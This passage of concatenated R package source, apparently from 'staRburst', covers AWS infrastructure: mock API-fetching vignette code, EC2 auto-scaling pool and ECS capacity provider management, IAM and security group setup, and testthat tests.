#         revenue = data$revenue %||% NA,
#         employees = data$employees %||% NA,
#         sector = data$sector %||% NA,
#         timestamp = Sys.time()
#       )
#     } else {
#       # Handle API errors
#       list(
#         ticker = ticker,
#         success = FALSE,
#         error = paste("HTTP", httr::status_code(response)),
#         timestamp = Sys.time()
#       )
#     }
#   }, error = function(e) {
#     # Handle network errors
#     list(
#       ticker = ticker,
#       success = FALSE,
#       error = as.character(e),
#       timestamp = Sys.time()
#     )
#   })
# }
# 
# # Helper: null-coalescing operator
# `%||%` <- function(x, y) if (is.null(x)) y else x

## ----mock-api, eval=FALSE-----------------------------------------------------
# # Mock function that simulates API with realistic delays
# fetch_company_data_mock <- function(ticker) {
#   # Simulate network latency
#   Sys.sleep(runif(1, 0.2, 0.8))
# 
#   # Simulate occasional failures (5% rate)
#   if (runif(1) < 0.05) {
#     return(list(
#       ticker = ticker,
#       success = FALSE,
#       error = "API timeout",
#       timestamp = Sys.time()
#     ))
#   }
# 
#   # Generate mock data
#   list(
#     ticker = ticker,
#     success = TRUE,
#     company_name = paste("Company", ticker),
#     market_cap = round(rnorm(1, 50e9, 20e9), 0),
#     pe_ratio = round(rnorm(1, 25, 10), 2),
#     revenue = round(rnorm(1, 10e9, 5e9), 0),
#     employees = round(rnorm(1, 50000, 20000), 0),
#     sector = sample(c("Technology", "Healthcare", "Finance", "Energy"), 1),
#     timestamp = Sys.time()
#   )
# }

## ----sample-data, eval=FALSE--------------------------------------------------
# # Generate mock ticker symbols
# set.seed(123)
# n_companies <- 1000
# tickers <- paste0(
#   sample(LETTERS, n_companies, replace = TRUE),
#   sample(LETTERS, n_companies, replace = TRUE),
#   sample(LETTERS, n_companies, replace = TRUE)
# )
# 
# head(tickers)
# # [1] "NAL" "RPL" "OQM" "TYW" "AIT" "UMD"

## ----local, eval=FALSE--------------------------------------------------------
# cat(sprintf("Fetching data for %d companies locally...\n", length(tickers)))
# 
# local_start <- Sys.time()
# local_results <- lapply(head(tickers, 50), fetch_company_data_mock)
# local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
# 
# cat(sprintf("[OK] Completed 50 calls in %.1f seconds\n", local_time))
# cat(sprintf("  Estimated time for %d: %.1f minutes\n",
#             n_companies, local_time * n_companies / 50 / 60))

## ----cloud, eval=FALSE--------------------------------------------------------
# cat(sprintf("Fetching data for %d companies on AWS...\n", n_companies))
# 
# # ~100 tasks, each fetching a chunk of tickers
# batches <- split(tickers, ceiling(seq_along(tickers) / ceiling(length(tickers) / 100)))
# results <- starburst_map(
#   batches,
#   function(batch) lapply(batch, fetch_company_data_mock),
#   workers = 25,
#   cpu = 1,
#   memory = "2GB"
# )
# results <- unlist(results, recursive = FALSE)  # flatten to 1,000 results

## ----analysis, eval=FALSE-----------------------------------------------------
# # Convert results to data frame
# results_df <- do.call(rbind, lapply(results, function(x) {
#   if (x$success) {
#     data.frame(
#       ticker = x$ticker,
#       company_name = x$company_name,
#       market_cap = x$market_cap,
#       pe_ratio = x$pe_ratio,
#       revenue = x$revenue,
#       employees = x$employees,
#       sector = x$sector,
#       success = TRUE,
#       error = NA,
#       stringsAsFactors = FALSE
#     )
#   } else {
#     data.frame(
#       ticker = x$ticker,
#       company_name = NA,
#       market_cap = NA,
#       pe_ratio = NA,
#       revenue = NA,
#       employees = NA,
#       sector = NA,
#       success = FALSE,
#       error = x$error,
#       stringsAsFactors = FALSE
#     )
#   }
# }))
# 
# # Summary
# success_rate <- mean(results_df$success) * 100
# cat(sprintf("\n=== Results Summary ===\n"))
# cat(sprintf("Total companies: %d\n", nrow(results_df)))
# cat(sprintf("Successful fetches: %d (%.1f%%)\n",
#             sum(results_df$success), success_rate))
# cat(sprintf("Failed fetches: %d\n", sum(!results_df$success)))
# 
# # Show sample of results
# cat("\n=== Sample Results ===\n")
# print(head(results_df[results_df$success, ], 10))
# 
# # Sector distribution
# cat("\n=== Sector Distribution ===\n")
# print(table(results_df$sector))
# 
# # Market cap summary
# cat("\n=== Market Cap Summary ===\n")
# cat(sprintf("Mean: $%.2fB\n",
#             mean(results_df$market_cap, na.rm = TRUE) / 1e9))
# cat(sprintf("Median: $%.2fB\n",
#             median(results_df$market_cap, na.rm = TRUE) / 1e9))
# cat(sprintf("Range: $%.2fB - $%.2fB\n",
#             min(results_df$market_cap, na.rm = TRUE) / 1e9,
#             max(results_df$market_cap, na.rm = TRUE) / 1e9))

## ----rate-limiting, eval=FALSE------------------------------------------------
# # per_worker_rate is calls/minute allowed to THIS worker
# fetch_with_rate_limit <- function(ticker, per_worker_rate) {
#   delay <- 60 / per_worker_rate + runif(1, 0, 0.1)
#   Sys.sleep(delay)
#   fetch_company_data(ticker)
# }
# 
# global_limit <- 100   # API allows 100 calls/minute total
# workers      <- 10
# per_worker   <- global_limit / workers   # 10 calls/min each
# 
# results <- starburst_map(
#   tickers,
#   function(x) fetch_with_rate_limit(x, per_worker_rate = per_worker),
#   workers = workers
# )

## ----error-handling, eval=FALSE-----------------------------------------------
# fetch_with_retry <- function(ticker, max_retries = 3) {
#   for (attempt in 1:max_retries) {
#     result <- fetch_company_data(ticker)
# 
#     if (result$success) {
#       return(result)
#     }
# 
#     # Exponential backoff
#     if (attempt < max_retries) {
#       Sys.sleep(2^attempt + runif(1, 0, 1))
#     }
#   }
# 
#   # Return failure after all retries
#   result$error <- paste("Failed after", max_retries, "retries:", result$error)
#   return(result)
# }

## ----eval=FALSE---------------------------------------------------------------
# system.file("examples/api-calls.R", package = "starburst")

## ----eval=FALSE---------------------------------------------------------------
# source(system.file("examples/api-calls.R", package = "starburst"))

#' EC2 Pool Management for staRburst
#'
#' Functions for managing Auto-Scaling Groups and ECS Capacity Providers
#' to maintain warm pools of EC2 instances for fast task execution.
#'
#' @name ec2-pool
#' @keywords internal
NULL

# get_ec2_client() is defined in R/aws-clients.R (single source of truth).

#' Get Auto Scaling client
#'
#' @param region AWS region
#' @return Auto Scaling client
#' @keywords internal
get_autoscaling_client <- function(region) {
  paws.management::autoscaling(config = list(region = region))
}

#' Get ECS-optimized AMI ID for region and architecture
#'
#' @param region AWS region
#' @param architecture CPU architecture ("X86_64" or "ARM64")
#' @return AMI ID
#' @keywords internal
get_ecs_optimized_ami <- function(region, architecture = "X86_64") {
  ssm <- paws.management::ssm(config = list(region = region))

  # AWS SSM parameter paths for ECS-optimized AMIs
  param_path <- if (architecture == "ARM64") {
    "/aws/service/ecs/optimized-ami/amazon-linux-2/arm64/recommended/image_id"
  } else {
    "/aws/service/ecs/optimized-ami/amazon-linux-2/recommended/image_id"
  }

  tryCatch({
    result <- ssm$get_parameter(Name = param_path)
    result$Parameter$Value
  }, error = function(e) {
    stop(sprintf("Failed to get ECS-optimized AMI for %s in %s: %s",
                 architecture, region, e$message))
  })
}

#' Setup EC2 capacity provider for ECS cluster
#'
#' Creates Launch Template, Auto-Scaling Group, and ECS Capacity Provider
#'
#' @param backend Backend configuration object
#' @return List with capacity provider details
#' @keywords internal
setup_ec2_capacity_provider <- function(backend) {
  cat_info(sprintf("[Setup] Setting up EC2 capacity provider for %s...\n", backend$instance_type))

  region <- backend$region
  cluster_name <- backend$cluster
  instance_type <- backend$instance_type
  architecture <- backend$architecture
  use_spot <- backend$use_spot
  capacity_provider_name <- backend$capacity_provider_name
  asg_name <- backend$asg_name

  ec2 <- get_ec2_client(region)
  autoscaling <- get_autoscaling_client(region)
  ecs <- get_ecs_client(region)

  # Check if capacity provider already exists
  tryCatch({
    cp_response <- ecs$describe_capacity_providers(
      capacityProviders = list(capacity_provider_name)
    )
    if (length(cp_response$capacityProviders) > 0) {
      cat_success(sprintf("[OK] Capacity provider already exists: %s\n", capacity_provider_name))
      return(invisible(NULL))
    }
  }, error = function(e) {
    # Capacity provider doesn't exist, continue with setup
  })

  # Get ECS-optimized AMI
  cat_info(sprintf("   * Finding ECS-optimized AMI for %s...\n", architecture))
  ami_id <- get_ecs_optimized_ami(region, architecture)
  cat_info(sprintf("   * AMI ID: %s\n", ami_id))

  # Get or create IAM instance profile
  instance_profile_arn <- ensure_ecs_instance_profile(region)

  # Get or create security group
  security_group_id <- ensure_ecs_security_group(region)

  # Create Launch Template
  lt_name <- sprintf("starburst-lt-%s", instance_type)
  cat_info(sprintf("   * Creating Launch Template: %s...\n", lt_name))

  user_data <- sprintf(
    paste0("#!/bin/bash\n",
           "echo ECS_CLUSTER=%s >> /etc/ecs/ecs.config\n",
           "echo ECS_ENABLE_TASK_IAM_ROLE=true >> /etc/ecs/ecs.config\n",
           "echo ECS_ENABLE_CONTAINER_METADATA=true >> /etc/ecs/ecs.config"),
    cluster_name
  )
  user_data_encoded <- as.character(base64enc::base64encode(charToRaw(user_data)))

  # Delete existing launch template if it exists
  tryCatch({
    ec2$delete_launch_template(LaunchTemplateName = lt_name)
  }, error = function(e) {
    # Launch template doesn't exist, continue
  })

  lt_params <- list(
    LaunchTemplateName = lt_name,
    LaunchTemplateData = list(
      ImageId = ami_id,
      InstanceType = instance_type,
      IamInstanceProfile = list(Arn = instance_profile_arn),
      SecurityGroupIds = list(security_group_id),
      UserData = user_data_encoded,
      TagSpecifications = list(
        list(
          ResourceType = "instance",
          Tags = list(
            list(Key = "Name", Value = sprintf("starburst-worker-%s", instance_type)),
            list(Key = "ManagedBy", Value = "starburst")
          )
        )
      )
    )
  )

  if (use_spot) {
    lt_params$LaunchTemplateData$InstanceMarketOptions <- list(
      MarketType = "spot",
      SpotOptions = list(
        MaxPrice = "", # Use on-demand price as max
        SpotInstanceType = "one-time"
      )
    )
  }

  tryCatch({
    do.call(ec2$create_launch_template, lt_params)
    cat_success(sprintf("[OK] Launch Template created: %s\n", lt_name))
  }, error = function(e) {
    cat_error(sprintf("[ERROR] Launch Template creation failed: %s\n", e$message))
    cat_error(sprintf("  Full error: %s\n", paste(capture.output(print(e)), collapse = "\n")))
    stop(e)
  })

  # Create Auto-Scaling Group
  cat_info(sprintf("   * Creating Auto-Scaling Group: %s...\n", asg_name))

  # Get default VPC subnets
  vpc_response <- ec2$describe_vpcs(Filters = list(list(Name = "isDefault", Values = list("true"))))
  if (length(vpc_response$Vpcs) == 0) {
    stop("No default VPC found. Please create a VPC first.")
  }
  vpc_id <- vpc_response$Vpcs[[1]]$VpcId

  subnet_response <- ec2$describe_subnets(Filters = list(list(Name = "vpc-id", Values = list(vpc_id))))
  subnet_ids <- vapply(subnet_response$Subnets, function(s) s$SubnetId, FUN.VALUE = character(1))

  if (length(subnet_ids) == 0) {
    stop("No subnets found in default VPC")
  }

  # Delete existing ASG if it exists and wait for deletion to complete
  tryCatch({
    autoscaling$delete_auto_scaling_group(
      AutoScalingGroupName = asg_name,
      ForceDelete = TRUE
    )
    cat_info("   * Waiting for ASG deletion to complete...\n")

    # Wait for deletion (max 60 seconds)
    for (i in 1:12) {
      Sys.sleep(5)
      asg_exists <- tryCatch({
        autoscaling$describe_auto_scaling_groups(
          AutoScalingGroupNames = list(asg_name)
        )
        TRUE
      }, error = function(e) {
        FALSE
      })

      if (!asg_exists) {
        break
      }

      if (i == 12) {
        cat_warn("[WARNING] ASG deletion taking longer than expected, continuing anyway...\n")
      }
    }
  }, error = function(e) {
    # ASG doesn't exist, continue
  })

  asg_params <- list(
    AutoScalingGroupName = asg_name,
    MinSize = 0,
    MaxSize = 100,
    DesiredCapacity = 0,
    VPCZoneIdentifier = paste(subnet_ids, collapse = ","),
    LaunchTemplate = list(
      LaunchTemplateName = lt_name,
      Version = "$Latest"
    ),
    HealthCheckType = "EC2",
    HealthCheckGracePeriod = 300,
    Tags = list(
      list(
        Key = "Name",
        Value = sprintf("starburst-asg-%s", instance_type),
        PropagateAtLaunch = TRUE
      ),
      list(
        Key = "AmazonECSManaged",
        Value = "true",
        PropagateAtLaunch = FALSE
      )
    )
  )

  tryCatch({
    do.call(autoscaling$create_auto_scaling_group, asg_params)
    cat_success(sprintf("[OK] Auto-Scaling Group created: %s\n", asg_name))
  }, error = function(e) {
    cat_error(sprintf("[ERROR] ASG creation failed: %s\n", e$message))
    cat_error(sprintf("  Full error: %s\n", paste(capture.output(print(e)), collapse = "\n")))
    stop(e)
  })

  # Get the actual ASG ARN
  asg_describe <- autoscaling$describe_auto_scaling_groups(
    AutoScalingGroupNames = list(asg_name)
  )
  asg_arn <- asg_describe$AutoScalingGroups[[1]]$AutoScalingGroupARN

  # Create ECS Capacity Provider
  cat_info(sprintf("   * Creating ECS Capacity Provider: %s...\n", capacity_provider_name))

  cp_params <- list(
    name = capacity_provider_name,
    autoScalingGroupProvider = list(
      autoScalingGroupArn = asg_arn,
      managedScaling = list(
        status = "ENABLED",
        targetCapacity = 100,
        minimumScalingStepSize = 1,
        maximumScalingStepSize = 10
      ),
      managedTerminationProtection = "DISABLED"
    ),
    tags = list(
      list(key = "ManagedBy", value = "starburst")
    )
  )

  tryCatch({
    do.call(ecs$create_capacity_provider, cp_params)
    cat_success(sprintf("[OK] Capacity Provider created: %s\n", capacity_provider_name))
  }, error = function(e) {
    cat_error(sprintf("[ERROR] Capacity Provider creation failed: %s\n", e$message))
    stop(e)
  })

  # Ensure cluster exists
  cluster_exists <- tryCatch({
    cluster_response <- ecs$describe_clusters(clusters = list(cluster_name))
    length(cluster_response$clusters) > 0 && cluster_response$clusters[[1]]$status == "ACTIVE"
  }, error = function(e) {
    FALSE
  })

  if (!cluster_exists) {
    cat_info(sprintf("   * Creating ECS cluster: %s...\n", cluster_name))
    ecs$create_cluster(clusterName = cluster_name)
    cat_success(sprintf("[OK] Cluster created: %s\n", cluster_name))
  }

  # Associate capacity provider with cluster
  cat_info(sprintf("   * Associating with cluster: %s...\n", cluster_name))

  # Get existing capacity providers
  cluster_response <- ecs$describe_clusters(clusters = list(cluster_name))
  existing_providers <- if (length(cluster_response$clusters) > 0) {
    cluster_response$clusters[[1]]$capacityProviders
  } else {
    list()
  }

  # Add new capacity provider if not already present
  if (!capacity_provider_name %in% existing_providers) {
    all_providers <- c(existing_providers, list(capacity_provider_name))

    ecs$put_cluster_capacity_providers(
      cluster = cluster_name,
      capacityProviders = all_providers,
      defaultCapacityProviderStrategy = list()
    )
    cat_success(sprintf("[OK] Capacity Provider associated with cluster\n"))
  } else {
    cat_success(sprintf("[OK] Capacity Provider already associated with cluster\n"))
  }

  cat_success("[OK] EC2 capacity provider setup complete\n")

  invisible(list(
    capacity_provider_name = capacity_provider_name,
    asg_name = asg_name,
    launch_template_name = lt_name
  ))
}

#' Start warm EC2 pool
#'
#' Scales Auto-Scaling Group to desired capacity and waits for instances
#'
#' @param backend Backend configuration object
#' @param capacity Desired number of instances
#' @param timeout_seconds Maximum time to wait for instances (default: 180)
#' @return Invisible NULL
#' @keywords internal
start_warm_pool <- function(backend, capacity, timeout_seconds = 180) {
  cat_info(sprintf("[Starting] Starting warm pool: %d instances of %s...\n", capacity, backend$instance_type))

  region <- backend$region
  cluster_name <- backend$cluster_name
  asg_name <- backend$asg_name

  autoscaling <- get_autoscaling_client(region)
  ecs <- get_ecs_client(region)

  # Lazily provision the capacity provider + ASG for this instance type if it
  # doesn't exist yet. starburst_setup() only provisions the default (c7g.xlarge),
  # so a custom instance_type (e.g. c8a.xlarge) would otherwise fail here with an
  # opaque "AutoScalingGroup not found". setup_ec2_capacity_provider() is idempotent.
  asg_exists <- tryCatch({
    resp <- autoscaling$describe_auto_scaling_groups(
      AutoScalingGroupNames = list(asg_name)
    )
    length(resp$AutoScalingGroups) > 0
  }, error = function(e) FALSE)

  if (!asg_exists) {
    cat_info(sprintf(
      "[EC2] Capacity provider for %s not found; provisioning it now (once)...\n",
      backend$instance_type))
    tryCatch(
      setup_ec2_capacity_provider(backend),
      error = function(e) {
        stop(sprintf(
          paste0("Could not provision EC2 capacity for instance type '%s': %s\n",
                 "Provision it once with:\n",
                 "  starburst_setup_ec2(instance_types = \"%s\")"),
          backend$instance_type, conditionMessage(e), backend$instance_type))
      })
  }

  # Scale ASG to desired capacity
  autoscaling$set_desired_capacity(
    AutoScalingGroupName = asg_name,
    DesiredCapacity = as.integer(capacity)
  )

  cat_info(sprintf("   * Waiting for instances to join cluster (timeout: %ds)...\n", timeout_seconds))

  start_time <- Sys.time()
  while (TRUE) {
    elapsed <- as.numeric(difftime(Sys.time(), start_time, units = "secs"))

    if (elapsed > timeout_seconds) {
      stop(sprintf("Timeout waiting for instances to join cluster after %d seconds", timeout_seconds))
    }

    # Check ASG status
    asg_response <- autoscaling$describe_auto_scaling_groups(
      AutoScalingGroupNames = list(asg_name)
    )

    if (length(asg_response$AutoScalingGroups) > 0) {
      asg <- asg_response$AutoScalingGroups[[1]]

      # Count in-service instances
      in_service <- 0
      if (length(asg$Instances) > 0) {
        in_service <- sum(vapply(asg$Instances, function(i) {
          if (!is.null(i$LifecycleState)) {
            i$LifecycleState == "InService"
          } else {
            FALSE
          }
        }, FUN.VALUE = logical(1)))
      }

      cat_info(sprintf("   * Instances in service: %d/%d (%.0fs elapsed)\n",
                      in_service, capacity, elapsed))

      if (in_service >= capacity) {
        # Verify instances registered with ECS
        container_instances <- ecs$list_container_instances(cluster = cluster_name)

        if (length(container_instances$containerInstanceArns) >= capacity) {
          cat_success(sprintf("[OK] Pool ready: %d instances available\n", in_service))
          return(invisible(NULL))
        }
      }
    }

    Sys.sleep(5)
  }
}

#' Stop warm pool
#'
#' Scales Auto-Scaling Group to zero
#'
#' @param backend Backend configuration object
#' @return Invisible NULL
#' @keywords internal
stop_warm_pool <- function(backend) {
  cat_info(sprintf("[Stop] Stopping warm pool: %s...\n", backend$asg_name))

  region <- backend$region
  asg_name <- backend$asg_name

  autoscaling <- get_autoscaling_client(region)

  autoscaling$set_desired_capacity(
    AutoScalingGroupName = asg_name,
    DesiredCapacity = 0
  )

  cat_success("[OK] Pool scaled to zero\n")

  invisible(NULL)
}

#' Get pool status
#'
#' Query current state of the EC2 pool
#'
#' @param backend Backend configuration object
#' @return List with pool status information
#' @keywords internal
get_pool_status <- function(backend) {
  region <- backend$region
  cluster_name <- backend$cluster_name
  asg_name <- backend$asg_name

  autoscaling <- get_autoscaling_client(region)
  ecs <- get_ecs_client(region)

  # Get ASG status
  asg_response <- autoscaling$describe_auto_scaling_groups(
    AutoScalingGroupNames = list(asg_name)
  )

  if (length(asg_response$AutoScalingGroups) == 0) {
    return(list(
      exists = FALSE,
      running_instances = 0,
      in_service_instances = 0,
      desired_capacity = 0,
      ecs_instances = 0
    ))
  }

  asg <- asg_response$AutoScalingGroups[[1]]

  # Count in-service instances
  in_service <- 0
  if (length(asg$Instances) > 0) {
    in_service <- sum(vapply(asg$Instances, function(i) {
      if (!is.null(i$LifecycleState)) {
        i$LifecycleState == "InService"
      } else {
        FALSE
      }
    }, FUN.VALUE = logical(1)))
  }

  # Get ECS container instances
  container_instances <- ecs$list_container_instances(cluster = cluster_name)
  ecs_count <- length(container_instances$containerInstanceArns)

  list(
    exists = TRUE,
    running_instances = length(asg$Instances),
    in_service_instances = in_service,
    desired_capacity = asg$DesiredCapacity,
    ecs_instances = ecs_count,
    min_size = asg$MinSize,
    max_size = asg$MaxSize
  )
}

#' Ensure ECS instance IAM profile exists
#'
#' @param region AWS region
#' @return Instance profile ARN
#' @keywords internal
ensure_ecs_instance_profile <- function(region) {
  iam <- paws.security.identity::iam()

  role_name <- "starburstECSInstanceRole"
  profile_name <- "starburstECSInstanceProfile"

  # Check if role exists
  role_arn <- tryCatch({
    role_response <- iam$get_role(RoleName = role_name)
    role_response$Role$Arn
  }, error = function(e) {
    # Create role
    cat_info(sprintf("   * Creating IAM role: %s...\n", role_name))

    trust_policy <- jsonlite::toJSON(list(
      Version = "2012-10-17",
      Statement = list(
        list(
          Effect = "Allow",
          Principal = list(Service = "ec2.amazonaws.com"),
          Action = "sts:AssumeRole"
        )
      )
    ), auto_unbox = TRUE)

    role_response <- iam$create_role(
      RoleName = role_name,
      AssumeRolePolicyDocument = trust_policy,
      Description = "IAM role for staRburst ECS EC2 instances"
    )

    # Attach AWS managed policy for ECS
    iam$attach_role_policy(
      RoleName = role_name,
      PolicyArn = "arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role"
    )

    # Attach S3 access policy
    s3_policy <- jsonlite::toJSON(list(
      Version = "2012-10-17",
      Statement = list(
        list(
          Effect = "Allow",
          Action = list("s3:GetObject", "s3:PutObject", "s3:ListBucket"),
          Resource = list("arn:aws:s3:::starburst-results-*/*", "arn:aws:s3:::starburst-results-*")
        ),
        list(
          Effect = "Allow",
          Action = list("logs:CreateLogGroup", "logs:CreateLogStream", "logs:PutLogEvents"),
          Resource = "arn:aws:logs:*:*:*"
        )
      )
    ), auto_unbox = TRUE)

    iam$put_role_policy(
      RoleName = role_name,
      PolicyName = "starburstS3Access",
      PolicyDocument = s3_policy
    )

    cat_success(sprintf("[OK] IAM role created: %s\n", role_name))
    role_response$Role$Arn
  })

  # Check if instance profile exists
  profile_arn <- tryCatch({
    profile_response <- iam$get_instance_profile(InstanceProfileName = profile_name)
    profile_response$InstanceProfile$Arn
  }, error = function(e) {
    # Create instance profile
    cat_info(sprintf("   * Creating instance profile: %s...\n", profile_name))

    profile_response <- iam$create_instance_profile(
      InstanceProfileName = profile_name
    )

    # Add role to instance profile
    iam$add_role_to_instance_profile(
      InstanceProfileName = profile_name,
      RoleName = role_name
    )

    # Wait for profile to propagate
    Sys.sleep(10)

    cat_success(sprintf("[OK] Instance profile created: %s\n", profile_name))
    profile_response$InstanceProfile$Arn
  })

  profile_arn
}

#' Ensure ECS security group exists
#'
#' @param region AWS region
#' @return Security group ID
#' @keywords internal
ensure_ecs_security_group <- function(region) {
  ec2 <- get_ec2_client(region)

  sg_name <- "starburst-ecs-workers"

  # Get default VPC
  vpc_response <- ec2$describe_vpcs(Filters = list(list(Name = "isDefault", Values = list("true"))))
  if (length(vpc_response$Vpcs) == 0) {
    stop("No default VPC found")
  }
  vpc_id <- vpc_response$Vpcs[[1]]$VpcId

  # Check if security group exists
  sg_response <- tryCatch({
    ec2$describe_security_groups(
      Filters = list(
        list(Name = "group-name", Values = list(sg_name)),
        list(Name = "vpc-id", Values = list(vpc_id))
      )
    )
  }, error = function(e) {
    list(SecurityGroups = list())
  })

  if (length(sg_response$SecurityGroups) > 0) {
    return(sg_response$SecurityGroups[[1]]$GroupId)
  }

  # Create security group
  cat_info(sprintf("   * Creating security group: %s...\n", sg_name))

  sg <- ec2$create_security_group(
    GroupName = sg_name,
    Description = "Security group for staRburst ECS workers",
    VpcId = vpc_id
  )

  sg_id <- sg$GroupId

  # Add egress rule (allow all outbound)
  # Ignore if rule already exists (security groups have default egress rules)
  tryCatch({
    ec2$authorize_security_group_egress(
      GroupId = sg_id,
      IpPermissions = list(
        list(
          IpProtocol = "-1",
          IpRanges = list(list(CidrIp = "0.0.0.0/0"))
        )
      )
    )
  }, error = function(e) {
    # Ignore duplicate rule errors
    if (!grepl("InvalidPermission.Duplicate", e$message, ignore.case = TRUE)) {
      stop(e)
    }
  })

  cat_success(sprintf("[OK] Security group created: %s\n", sg_id))

  sg_id
}

# Integration tests for EC2 functionality
# These tests require AWS credentials and will create real resources

test_that("EC2 pool management works", {
  skip_on_cran()
  skip_if_not(check_aws_credentials(), "AWS credentials not available")
  skip_if_not(is_setup_complete(), "starburst not configured")

  config <- get_starburst_config()

  # Create test backend
  backend <- list(
    cluster_name = config$cluster_name,
    region = config$region,
    launch_type = "EC2",
    instance_type = "c6a.large",
    use_spot = FALSE,
    architecture = "X86_64",
    warm_pool_timeout = 600,
    capacity_provider_name = "starburst-c6a-large",
    asg_name = "starburst-asg-c6a-large",
    workers = 1,  # Minimal for testing
    aws_account_id = config$aws_account_id,
    pool_started_at = NULL
  )

  # Test: Get pool status
  status <- get_pool_status(backend)
  expect_type(status, "list")
  expect_true("desired_capacity" %in% names(status))
  expect_true("running_instances" %in% names(status))

  # Test: Start pool (skip actual startup to save time)
  # In real testing, uncomment this:
  # start_warm_pool(backend, capacity = 1, timeout_seconds = 120)
  # expect_true(status$desired_capacity == 1)

  # Test: Stop pool
  stop_warm_pool(backend)
  Sys.sleep(2)
  status <- get_pool_status(backend)
  expect_equal(status$desired_capacity, 0)
})

test_that("Architecture detection works", {
  expect_equal(get_architecture_from_instance_type("c6a.large"), "X86_64")
  expect_equal(get_architecture_from_instance_type("c7g.xlarge"), "ARM64")
  expect_equal(get_architecture_from_instance_type("c8a.2xlarge"), "X86_64")
  expect_equal(get_architecture_from_instance_type("c8g.xlarge"), "ARM64")
  expect_equal(get_architecture_from_instance_type("m6a.large"), "X86_64")
})

test_that("Instance pricing lookup works", {
  price_ondemand <- get_ec2_instance_price("c6a.large", use_spot = FALSE)
  price_spot <- get_ec2_instance_price("c6a.large", use_spot = TRUE)

  expect_type(price_ondemand, "double")
  expect_type(price_spot, "double")
  expect_true(price_ondemand > 0)
  expect_true(price_spot > 0)
  expect_true(price_spot < price_ondemand)  # Spot should be cheaper
})

test_that("Cost estimation works", {
  cost <- estimate_cost(
    workers = 10,
    cpu = 4,
    memory = "8GB",
    estimated_runtime_hours = 1,
    launch_type = "EC2",
    instance_type = "c6a.large",
    use_spot = FALSE
  )

  expect_type(cost, "list")
  expect_true("per_instance" %in% names(cost))
  expect_true("instances_needed" %in% names(cost))
  expect_true("total_estimated" %in% names(cost))
  expect_true(cost$total_estimated > 0)
})

test_that("ECR image age checking works", {
  skip_on_cran()
  skip_if_not(check_aws_credentials(), "AWS credentials not available")

  config <- get_starburst_config()

  # Test with a TTL that won't trigger rebuild
  result <- check_ecr_image_age(
    region = config$region,
    image_tag = "base-4.5.2",
    ttl_days = 30,
    force_rebuild = FALSE
  )

  expect_type(result, "logical")
})

test_that("Multi-platform detection from manifest works", {
  skip_on_cran()
  skip_if_not(check_aws_credentials(), "AWS credentials not available")
  skip_if(Sys.which("docker") == "", "Docker not installed")
  skip_if_not(
    tryCatch({ processx::run("docker", "info", error_on_status = FALSE)$status == 0 },
             error = function(e) FALSE),
    "Docker daemon not running"
  )

  config <- get_starburst_config()
  account_id <- config$aws_account_id
  region <- config$region

  # Check if base image has both platforms
  image_uri <- sprintf("%s.dkr.ecr.%s.amazonaws.com/starburst-worker:base-4.5.2",
                      account_id, region)

  # This test requires the image to exist
  skip_if(!check_ecr_image_exists("base-4.5.2", region), "Base image doesn't exist")

  # Use docker manifest inspect to check platforms
  cmd <- sprintf("docker manifest inspect %s 2>/dev/null | grep -c '\"architecture\"'",
                shQuote(image_uri))
  result <- system(cmd, intern = TRUE, ignore.stderr = TRUE)

  # Should have at least 2 architectures (amd64, arm64)
  # Plus possibly attestation manifests
  expect_true(as.integer(result) >= 2)
})

test_that("start_warm_pool lazily provisions a missing capacity provider", {
  skip_if_not_installed("mockery")

  backend <- list(
    region = "us-east-1", cluster = "starburst-cluster",
    cluster_name = "starburst-cluster", instance_type = "c8a.xlarge",
    architecture = "X86_64", use_spot = TRUE,
    capacity_provider_name = "starburst-c8a-xlarge",
    asg_name = "starburst-asg-c8a-xlarge", workers = 5
  )

  # ASG does NOT exist -> empty AutoScalingGroups.
  autoscaling <- list(
    describe_auto_scaling_groups = function(...) list(AutoScalingGroups = list()),
    set_desired_capacity = function(...) stop("stop-after-provision")  # sentinel
  )
  mockery::stub(start_warm_pool, "get_autoscaling_client", function(...) autoscaling)
  mockery::stub(start_warm_pool, "get_ecs_client", function(...) list())

  provisioned <- mockery::mock(invisible(TRUE))
  mockery::stub(start_warm_pool, "setup_ec2_capacity_provider", provisioned)

  # Missing ASG -> provision, then hit the set_desired_capacity sentinel.
  expect_error(start_warm_pool(backend, capacity = 5), "stop-after-provision")
  mockery::expect_called(provisioned, 1)
})

test_that("start_warm_pool does NOT re-provision an existing capacity provider", {
  skip_if_not_installed("mockery")

  backend <- list(
    region = "us-east-1", cluster = "starburst-cluster",
    cluster_name = "starburst-cluster", instance_type = "c7g.xlarge",
    architecture = "ARM64", use_spot = TRUE,
    capacity_provider_name = "starburst-c7g-xlarge",
    asg_name = "starburst-asg-c7g-xlarge", workers = 5
  )

  # ASG already exists.
  autoscaling <- list(
    describe_auto_scaling_groups = function(...)
      list(AutoScalingGroups = list(list(AutoScalingGroupName = backend$asg_name))),
    set_desired_capacity = function(...) stop("stop-after-scale")  # sentinel
  )
  mockery::stub(start_warm_pool, "get_autoscaling_client", function(...) autoscaling)
  mockery::stub(start_warm_pool, "get_ecs_client", function(...) list())

  provisioned <- mockery::mock(invisible(TRUE))
  mockery::stub(start_warm_pool, "setup_ec2_capacity_provider", provisioned)

  expect_error(start_warm_pool(backend, capacity = 5), "stop-after-scale")
  mockery::expect_called(provisioned, 0)  # existing ASG -> no provisioning
})

#' Starburst Future Backend
#'
#' A future backend for running parallel R workloads on AWS ECS
#'
#' @param workers Number of parallel workers
#' @param cpu vCPUs per worker (1, 2, 4, 8, or 16)
#' @param memory Memory per worker (supports GB notation, e.g., "8GB")
#' @param region AWS region (default: from config or "us-east-1")
#' @param timeout Maximum runtime in seconds (default: 3600)
#' @param launch_type "EC2" or "FARGATE" (default: "EC2")
#' @param instance_type EC2 instance type (e.g., "c6a.large")
#' @param use_spot Use spot instances (default: FALSE)
#' @param warm_pool_timeout Pool timeout in seconds (default: 3600)
#' @param ... Additional arguments
#'
#' @return A StarburstBackend object
#' @export
StarburstBackend <- function(workers = 10,
                             cpu = 4,
                             memory = "8GB",
                             region = NULL,
                             timeout = 3600,
                             launch_type = "EC2",
                             instance_type = "c6a.large",
                             use_spot = FALSE,
                             warm_pool_timeout = 3600,
                             ...) {

  # Validate inputs
  validate_workers(workers)
  validate_launch_type(launch_type)

  # For EC2, auto-adjust cpu/memory based on instance type
  if (launch_type == "EC2") {
    validate_instance_type(instance_type)
    instance_specs <- get_instance_specs(instance_type)

    # Use max available resources on instance
